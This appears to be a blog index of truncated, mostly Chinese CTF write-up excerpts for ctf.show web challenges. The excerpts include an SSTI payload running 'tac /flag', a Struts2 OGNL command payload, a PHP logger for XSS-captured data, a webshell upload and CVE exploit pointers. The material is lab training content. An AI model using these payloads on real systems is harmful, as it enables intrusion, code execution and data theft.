Recharging Runtime

web361提示名字就是考点，测试 /?name=a 可以看到 Hello a，改成 { {2*2}} 返回 4 确认存在漏洞。payload: /?name={ { config.__class__.__init__.__globals__['os'].popen('tac /flag').read()} } web3621234567891011121... Continue reading...

web3511234567891011<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result... Continue reading...

web345复现失败，题目改过了，{"sub":"admin"} 也不好使，外面还多了一层中括号。。。 web34612345678910111213141516171819202122232425262728293031323334353637383940$ python .\jwt_tool.py 'eyJhbGciOiJIUzI1... Continue reading...

web334nodejs 代码审计题。login.js: 123456789101112131415161718192021222324252627282930313233var express = require('express');var router = express.Router();var users = require('../modules/user').items; ... Continue reading...

web301checklogin.php 123456789101112131415161718192021222324252627<?phperror_reporting(0);session_start();require 'conn.php';$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";$_POST[... Continue reading...

web316首先起一个服务记录请求参数。 12345678<?php$content = $_GET["a"];if (isset($content)) { file_put_contents("flag.txt", $content.PHP_EOL, FILE_APPEND);}?><script>alert("新年快乐!");<... Continue reading...

web279-web283脚本一键利用 https://github.com/wyzmgmdg/Struts2Scan web284Struts-S2-012漏洞利用，参考文章构造 payload。 1%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"... Continue reading...

web311PHP-fpm 远程代码执行漏洞(CVE-2019-11043)，使用这个工具就可以命令执行啦。这就是 PWN 👴的世界吗？i了i了 web312PHP imap 远程命令执行漏洞（CVE-2018-19518）。 php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell，而debian/ubuntu中默认使用ssh... Continue reading...

web151经测试可知，这道题只有前端验证文件名后缀的限制。burp 抓包后改成 php 传 shell。 1234567891011121314151617181920POST /upload.php HTTP/1.1Host: 5f810fb9-0ec7-4467-8857-b8bdd38185e0.challenge.ctf.showContent-Length: 204Accep... Continue reading...

Challenge SolvingSource Fileindex.php12345678910111213141516171819<?phpinclude("class.php");error_reporting(0);highlight_file(__FILE__);ini_set("session.serialize_handler", "php");session_start(... Continue reading...